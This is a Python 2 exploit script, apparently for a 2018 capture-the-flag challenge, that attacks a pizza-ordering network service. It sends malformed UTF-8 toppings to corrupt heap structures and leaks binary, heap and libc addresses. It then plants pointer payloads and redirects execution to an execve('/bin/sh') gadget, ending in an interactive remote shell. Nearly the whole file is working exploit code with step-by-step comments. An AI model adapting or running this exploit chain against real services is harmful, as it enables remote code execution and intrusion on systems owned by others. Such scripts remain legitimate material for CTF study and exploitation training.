import socket, struct, os, binascii, base64
import telnetlib
from pow import *
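def readline(sc, show=True):
    """Read one newline-terminated line from socket *sc* and return it
    without the trailing "\\n".

    The socket is read one byte at a time (presumably deliberate: nothing
    past the newline is consumed, so the next read starts exactly where the
    protocol dialogue left off). When *show* is true the line is echoed
    to stdout as a repr, which is how the exploit traces the dialogue.

    Raises EOFError (a subclass of Exception, so existing callers that
    catch Exception are unaffected) if the peer closes the connection
    before a newline arrives; what was collected so far is printed first.

    Caveat when this is used to read a raw leaked pointer: reading stops
    at the first 0x0a byte, so a pointer that happens to contain 0x0a
    comes back short and any value derived from it is wrong.
    """
    buf = ""
    while not buf.endswith("\n"):
        ch = sc.recv(1)
        if not ch:
            print(repr(buf))
            raise EOFError("Server disconnected")
        buf += ch
    line = buf[:-1]
    if show:
        print(repr(line))
    return line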
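def read_until(sc, s):
    """Consume bytes from *sc* one at a time until the data ends with *s*.

    Returns everything read before the delimiter; the delimiter itself is
    consumed but not returned. An empty *s* matches immediately and
    returns "" without reading. Nothing is echoed on success.

    Raises EOFError (a subclass of Exception, so existing callers are
    unaffected) if the peer closes first, after printing what was
    collected.
    """
    buf = ""
    while not buf.endswith(s):
        ch = sc.recv(1)
        if not ch:
            print(repr(buf))
            raise EOFError("Server disconnected")
        buf += ch
    # Slice by explicit length rather than buf[:-len(s)], which would mean
    # buf[:0] for an empty delimiter.
    return buf[:len(buf) - len(s)]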
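def read_all(sc, n):
    """Read exactly *n* bytes from *sc*, looping over short recv() results.

    Returns the *n* bytes as one string (an empty string for n <= 0).
    Not used by the exploit sequence in this file, but kept as part of the
    helper set.

    Raises EOFError (a subclass of Exception, so existing callers are
    unaffected) if the peer closes before *n* bytes arrived, after
    printing what was collected.
    """
    chunks = []
    got = 0
    while got < n:
        block = sc.recv(n - got)
        if not block:
            print(repr("".join(chunks)))
            raise EOFError("Server disconnected")
        chunks.append(block)
        got += len(block)
    # join instead of repeated += so large reads are not quadratic
    return "".join(chunks)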
def I(n):
    """Pack *n* as a little-endian unsigned 32-bit integer (4 bytes).

    Not referenced by the exploit sequence below; kept as the 32-bit
    counterpart of Q().
    """
    packer = struct.Struct("<I")
    return packer.pack(n)
def Q(n):
    """Pack *n* as a little-endian unsigned 64-bit integer (8 bytes).

    Used to lay raw pointers into the payloads sent to the target.
    """
    packer = struct.Struct("<Q")
    return packer.pack(n)
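# ---------------------------------------------------------------------------
# Exploit body. Python 2: str is bytes, so the raw byte strings below go
# straight onto the socket. The single-letter strings sent are the target's
# menu commands; their meanings are inferred from the order of the dialogue
# and from the prompts this script waits for, not from the binary itself.
#
# Flow: solve the proof-of-work, leak a pointer into the PIE binary, leak a
# heap pointer, plant a 95-byte payload built from those two, read a libc
# pointer (puts) back out of the corrupted structure, then write a second
# payload pointing at a libc gadget and drop into an interactive shell.
#
# All writes use sendall(): send() may transmit fewer bytes than requested,
# which would desynchronise a line-oriented dialogue like this one.
# ---------------------------------------------------------------------------

# libc-build-specific offsets: libcbase = leaked_puts - puts_offset, and the
# final target is libcbase + shell_offset. They look like the x86-64 Ubuntu
# 16.04 glibc 2.23 values (puts, and a one_gadget-style execve("/bin/sh")
# address) -- re-derive both for any other libc; a wrong pair just crashes
# the service after the leaks.
puts_offset = 0x6f690
shell_offset = 0x4526a

# Offset of the leaked object inside the PIE image, so that
# elfaddr - ELF_LEAK_OFFSET is the image base (inferred from the small
# code/data offsets the payload adds to it below).
ELF_LEAK_OFFSET = 0x20bbe0


def _expect_page_aligned(name, addr):
    """Abort early if a derived image base is not 4 KiB aligned.

    Both the PIE base and the libc base are page aligned when the leak and
    the offset are right; anything else almost always means the leaked value
    came back truncated (see _read_qword_leak), and a payload built from it
    would only crash the service.
    """
    if addr & 0xfff:
        raise RuntimeError("%s = %#x is not page aligned; leak looks wrong"
                           % (name, addr))


def _read_qword_leak(sc):
    """Return the pointer the server echoes on the current line as an int.

    The echoed value is a raw little-endian pointer without its high zero
    bytes (presumably printed as a C string), hence the zero padding to 8.
    Caveat: readline() stops at the first 0x0a byte, so a pointer that
    happens to contain 0x0a comes back short and the derived base is
    garbage; _expect_page_aligned() catches that for the two image bases.
    """
    raw = readline(sc, False).ljust(8, "\x00")
    return struct.unpack("<Q", raw)[0]


def _order_single_x_pizza(sc):
    """Order a one-topping pizza whose single kind-1 topping is the byte 'x'."""
    sc.sendall("O\n")
    sc.sendall("1\n")
    sc.sendall("1\n")
    sc.sendall("x\n")


def _order_overflow_pizza(sc):
    """Order a 17-topping pizza: 16 toppings of kind 2, then one of kind 1.

    Kind 2 takes two input lines here and both are malformed UTF-8: a 3-byte
    lead 0xe0 followed by a 4-byte lead 0xf0 and a continuation byte, then
    two lone continuation bytes 0x8d 0x8d. The kind-1 topping is the valid
    4-byte sequence 0xf0 0x9f 0x8d 0x85 (U+1F345). Presumably the malformed
    sequences desynchronise the target's multibyte length accounting; the
    exact bug is not visible from this script. (Loop boundaries were
    reconstructed from a whitespace-flattened paste: 16 x 3 lines + 2 lines
    = 17 toppings, matching the count sent.)
    """
    sc.sendall("O\n")
    sc.sendall("17\n")
    for _ in xrange(16):
        sc.sendall("2\n")
        sc.sendall("\xe0\xf0\x9f\n")
        sc.sendall("\x8d\x8d\n")
    sc.sendall("1\n")
    sc.sendall("\xf0\x9f\x8d\x85\n")


# sc = socket.create_connection(("10.0.0.49", 12345))   # local test instance
sc = socket.create_connection(("83b1db91.quals2018.oooverflow.io", 31337))

# Proof-of-work handshake: a banner line, then "<text>: <challenge>" and
# "<text>: <n>". solve_pow comes from the local module imported as
# `from pow import *` at the top of the file.
readline(sc)
chall = readline(sc).split(": ")[1]
n = int(readline(sc).split(": ")[1])
res = solve_pow(chall, n)
print(res)
sc.sendall(str(res) + "\n")

# --- Phase 1: leak a pointer into the PIE binary ---------------------------
sc.sendall("N\n")
sc.sendall("goodpizza\n")
_order_single_x_pizza(sc)
sc.sendall("L\n")
sc.sendall("N\n")
sc.sendall("badpizza\n")
_order_overflow_pizza(sc)
sc.sendall("C\n")
sc.sendall("q" * 47 + "\n")   # 47-byte comment (phase 2 uses 31; presumably
                              # the length positions what gets leaked)
sc.sendall("Y\n")
sc.sendall("L\n")
sc.sendall("goodpizza\n")
sc.sendall("C\n")
sc.sendall("q\n")
sc.sendall("L\n")
sc.sendall("W\n")
read_until(sc, "this is what he had to say: ")
elfaddr = _read_qword_leak(sc)
print(hex(elfaddr))
elfbase = elfaddr - ELF_LEAK_OFFSET
_expect_page_aligned("elfbase", elfbase)

# --- Phase 2: same dance again to leak a heap pointer ----------------------
sc.sendall("N\n")
sc.sendall("goodpizza2\n")
_order_single_x_pizza(sc)
sc.sendall("L\n")
sc.sendall("N\n")
sc.sendall("badpizza2\n")
_order_overflow_pizza(sc)
sc.sendall("C\n")
sc.sendall("q" * 31 + "\n")
sc.sendall("Y\n")
sc.sendall("L\n")
sc.sendall("goodpizza2\n")
sc.sendall("C\n")
sc.sendall("q\n")
sc.sendall("L\n")
sc.sendall("W\n")
read_until(sc, "this is what he had to say: ")
heapaddr = _read_qword_leak(sc)
print(hex(heapaddr))

# --- Phase 3: plant the payload, then read a libc pointer back out ---------
sc.sendall("N\n")
sc.sendall("badpizza3\n")
_order_overflow_pizza(sc)
sc.sendall("L\n")
sc.sendall("N\n")
sc.sendall("goodpizza3\n")
sc.sendall("O\n")             # three kind-1 toppings, each the tomato emoji
sc.sendall("3\n")
for _ in xrange(3):
    sc.sendall("1\n")
    sc.sendall("\xf0\x9f\x8d\x85\n")
sc.sendall("C\n")
sc.sendall("q\n")
sc.sendall("L\n")
sc.sendall("L\n")
sc.sendall("badpizza3\n")
sc.sendall("C\n")
sc.sendall("q\n")
sc.sendall("P\n")

# 95-byte payload handed to the 'P' command: heap and binary pointers laid
# out at fixed positions; the ASCII runs are filler (presumably only their
# length matters). Earlier layout, kept for reference:
#   Q(elfbase + 0x181a) + Q(heapaddr + 0x13b0) + "222222223333333344444444"
#   + Q(heapaddr + 0x13b8) + "66666666777777778888888899999999aaaaaaaabbbbbbb"
ss = (
    Q(heapaddr + 0x13a0)
    + Q(elfbase + 0x20bea8)
    + Q(elfbase + 0x1c28)
    + "33333333"
    + Q(heapaddr + 0x1390)
    + Q(heapaddr + 0x13c8)
    + Q(heapaddr + 0x13c8)
    + Q(heapaddr + 0x13d0)
    + Q(elfbase + 0x181a)
    + "99999999aaaaaaaabbbbbbb"
)
# The payload has to fill its field exactly. A bare assert is stripped under
# `python -O`, so check explicitly.
if len(ss) != 95:
    raise ValueError("payload is %d bytes, expected 95" % len(ss))
sc.sendall(ss + "\n")

sc.sendall("L\n")
sc.sendall("goodpizza3\n")
sc.sendall("A\n")
read_until(sc, "Admire these beauties...")
read_until(sc, "ApprovedPizza: ")
libcaddr = _read_qword_leak(sc)
libcbase = libcaddr - puts_offset
_expect_page_aligned("libcbase", libcbase)
print(hex(libcbase))

# --- Phase 4: point the corrupted structure at the shell gadget ------------
sc.sendall(Q(heapaddr + 0x13d0) + Q(libcbase + shell_offset)
           + "ffffffffgggggggghhhhhhhhiiiiiiii" + "\n")

# Hand the socket to telnetlib purely for its interact() loop; once that
# returns, drain and print whatever the peer still sends.
t = telnetlib.Telnet()
t.sock = sc
t.interact()
while True:
    data = sc.recv(16384)
    if not data:
        break
    for line in data.split("\n"):
        print(repr(line))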